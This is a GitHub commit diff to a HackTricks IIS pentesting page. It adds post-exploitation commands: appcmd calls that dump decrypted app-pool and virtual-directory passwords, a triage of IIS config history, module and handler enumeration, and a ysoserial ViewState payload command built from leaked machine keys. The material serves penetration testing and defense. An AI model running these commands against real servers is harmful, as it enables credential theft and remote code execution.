Skip to content

Commit a446ccc

Browse files
authored
Merge pull request #2479 from HackTricks-wiki/research_update_src_network-services-pentesting_pentesting-web_iis-internet-information-services_20260708_032221
Research Update Enhanced src/network-services-pentesting/pen...
2 parents bd43773 + c6be74a commit a446ccc

1 file changed

Lines changed: 95 additions & 1 deletion

File tree

src/network-services-pentesting/pentesting-web/iis-internet-information-services.md

Lines changed: 95 additions & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -243,6 +243,46 @@ If you have filesystem or interactive access on the web server, co-located keys
243243

244244
With the key ring available, an operator running in the app’s identity can instantiate an IDataProtector with the same purposes and unprotect stored secrets. Misconfigurations that store the key ring with the app files make offline decryption trivial once the host is compromised.
245245

246+
247+
## Harvesting IIS configuration and credentials with ApplicationHost.config / AppCmd
248+
249+
`ApplicationHost.config` is the root IIS configuration file and usually lives at `%windir%\system32\inetsrv\config\applicationHost.config`. Once you get local code execution on the server, enumerate it before dropping more tooling because it often reveals:
250+
251+
- hidden site bindings / internal hostnames
252+
- applications mapped outside `C:\inetpub\wwwroot`
253+
- custom application-pool identities
254+
- virtual-directory credentials
255+
- globally registered native modules and per-app handlers/modules
256+
257+
Passwords stored there are usually **encrypted at rest** when configured through IIS Manager / AppCmd, but the local IIS management path can still return the **decrypted** values.
258+
259+
```cmd
260+
:: Site / app / vdir mapping
261+
%windir%\system32\inetsrv\appcmd.exe list site /config
262+
%windir%\system32\inetsrv\appcmd.exe list app /config
263+
%windir%\system32\inetsrv\appcmd.exe list vdir /config
264+
265+
:: App-pool identities / credentials
266+
%windir%\system32\inetsrv\appcmd.exe list apppool /text:name
267+
%windir%\system32\inetsrv\appcmd.exe list apppool "DefaultAppPool" /text:processModel.identityType
268+
%windir%\system32\inetsrv\appcmd.exe list apppool "DefaultAppPool" /text:processModel.userName
269+
%windir%\system32\inetsrv\appcmd.exe list apppool "DefaultAppPool" /text:processModel.password
270+
271+
:: Virtual-directory credentials
272+
%windir%\system32\inetsrv\appcmd.exe list vdir "Default Web Site/" /text:userName
273+
%windir%\system32\inetsrv\appcmd.exe list vdir "Default Web Site/" /text:password
274+
```
275+
276+
If you already have command execution as the IIS worker, also review `applicationHost.config` directly to harvest **bindings**, **physical paths**, and **module registrations** that may not be obvious from the current site only. Don't stop at the live file: IIS also keeps configuration history by default under `%SystemDrive%\inetpub\history`, so older `CFGHISTORY_*` snapshots may preserve **previous bindings, paths, usernames, or encrypted password blobs** even after admins cleaned the active config. Quick triage:
277+
278+
```cmd
279+
%windir%\system32\inetsrv\appcmd.exe list backups
280+
dir /b C:\inetpub\history
281+
dir /s /b C:\inetpub\history\applicationHost.config
282+
```
283+
284+
For broader post-exploitation loot after OS execution, check [Windows Local Privilege Escalation](../../windows-hardening/windows-local-privilege-escalation/README.md).
285+
246286
## IIS fileless backdoors and in-memory .NET loaders (NET-STAR style)
247287

248288
The Phantom Taurus/NET-STAR toolkit shows a mature pattern for fileless IIS persistence and post‑exploitation entirely inside w3wp.exe. The core ideas are broadly reusable for custom tradecraft and for detection/hunting.
@@ -349,6 +389,33 @@ See detailed techniques and PoCs here:
349389
telerik-ui-aspnet-ajax-unsafe-reflection-webresource-axd.md
350390
{{#endref}}
351391

392+
393+
## Enumerating IIS modules and handlers
394+
395+
Malicious or simply forgotten **IIS modules/handlers** are a recurring high-value finding: they expand the request pipeline, can introduce pre-auth attack surface, and are also a common **stealth persistence** mechanism once an attacker gets admin on the server. Native global modules are registered in `ApplicationHost.config`, while app-specific managed modules and handlers often live in `web.config`.
396+
397+
```cmd
398+
:: Global native modules
399+
%windir%\system32\inetsrv\appcmd.exe list config /section:system.webServer/globalModules
400+
401+
:: Per-site modules / handlers
402+
%windir%\system32\inetsrv\appcmd.exe list config "Default Web Site/" /section:system.webServer/modules
403+
%windir%\system32\inetsrv\appcmd.exe list config "Default Web Site/" /section:system.webServer/handlers
404+
405+
:: Fast triage for custom assemblies under the app root
406+
dir /s /b C:\inetpub\wwwroot\bin\*.dll
407+
```
408+
409+
Interesting hits include:
410+
411+
- custom DLLs loaded from an app `bin\` directory
412+
- handlers for `*.ashx`, `*.axd`, WebDAV verbs, upload endpoints, or diagnostic pages
413+
- third-party modules registered globally but enabled only for one application
414+
- modules mapped through `appcmd install module` instead of normal app deployment
415+
- assemblies parked in `%windir%\Microsoft.NET\assembly\` (GAC) and then referenced from IIS registration
416+
417+
Once you have admin on the server, a malicious module is often **quieter than an ASPX webshell** because it runs inside the legitimate IIS pipeline and can trigger only for a specific cookie, URL, header, or User-Agent. Real intrusions have used both **managed modules** and **GAC-registered assemblies** mapped into `w3wp.exe`, so if a registration points outside the app folder, treat it as suspicious until proven otherwise.
418+
352419
## Old IIS vulnerabilities worth looking for
353420

354421

@@ -397,6 +464,30 @@ ASPXAUTH uses the following info:
397464
However, some people will use the **default values** of these parameters and will use as **cookie the email of the user**. Therefore, if you can find a web using the **same platform** that is using the ASPXAUTH cookie and you **create a user with the email of the user you want to impersonate** on the server under attack, you may be able to us**e the cookie from the second server in the first one** and impersonate the user.\
398465
This attacked worked in this [**writeup**](https://infosecwriteups.com/how-i-hacked-facebook-part-two-ffab96d57b19).
399466

467+
468+
## MachineKey loot → ViewState and auth-cookie abuse
469+
470+
If a **`web.config` / `machine.config` leak**, backup disclosure, path traversal, or local shell gives you a `<machineKey>`, treat it as **active RCE / impersonation material** and not only as a secret leak. The same `validationKey` / `decryptionKey` pair can usually be reused to:
471+
472+
- forge malicious `__VIEWSTATE` payloads
473+
- decrypt or forge `.ASPXAUTH` / ASP.NET application cookies
474+
- pivot across sibling IIS nodes that reuse the same static keys
475+
476+
In 2025, Microsoft documented real intrusions abusing **publicly disclosed ASP.NET machine keys**, and reported identifying **more than 3,000 exposed keys** in public sources. Therefore, if you recover one key pair from a single app, test whether the same keys are reused across the rest of the farm.
477+
478+
```bash
479+
# Try known/public keys first
480+
badsecrets --url https://target.example/app/login.aspx
481+
482+
# If you already know the real keys, generate a ViewState payload
483+
ysoserial.exe -p ViewState -g TextFormattingRunProperties -c "whoami" \
484+
--path="/app/login.aspx" --apppath="/" \
485+
--validationalg="SHA1" --validationkey="<VALIDATION_KEY>" \
486+
--decryptionalg="AES" --decryptionkey="<DECRYPTION_KEY>"
487+
```
488+
489+
For the **legacy vs .NET 4.5+** details, `__VIEWSTATEGENERATOR`, `ViewStateUserKey`, split ViewState, and known-key bruteforce workflows, check [Exploiting `__VIEWSTATE`](../../pentesting-web/deserialization/exploiting-__viewstate-parameter.md) and [Exploiting `__VIEWSTATE` Knowing the Secret](../../pentesting-web/deserialization/exploiting-__viewstate-knowing-the-secret.md).
490+
400491
## IIS Authentication Bypass with cached passwords (CVE-2022-30209) <a href="#id-3-iis-authentication-bypass" id="id-3-iis-authentication-bypass"></a>
401492

402493
[Full report here](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html): A bug in the code **didn't properly check for the password given by the user**, so an attacker whose **password hash hits a key** that is already in the **cache** will be able to login as that user .
@@ -421,10 +512,13 @@ HTTP/1.1 401 Unauthorized
421512
HTTP/1.1 200 OK
422513
```
423514

515+
516+
424517
## References
425518

426519
- [0xdf – HTB Job (IIS write → ASPX shell → GodPotato)](https://0xdf.gitlab.io/2026/01/26/htb-job.html)
427520
- [Unit 42 – Phantom Taurus: A New Chinese Nexus APT and the Discovery of the NET-STAR Malware Suite](https://unit42.paloaltonetworks.com/phantom-taurus/)
428521
- [AMSI/ETW bypass background (HackTricks)](../../windows-hardening/av-bypass.md)
429-
522+
- [Microsoft – Introduction to ApplicationHost.config](https://learn.microsoft.com/en-us/iis/get-started/planning-your-iis-architecture/introduction-to-applicationhostconfig)
523+
- [Microsoft Threat Intelligence – Code injection attacks using publicly disclosed ASP.NET machine keys](https://www.microsoft.com/en-us/security/blog/2025/02/06/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys/)
430524
{{#include ../../banners/hacktricks-training.md}}

0 commit comments

Comments
 (0)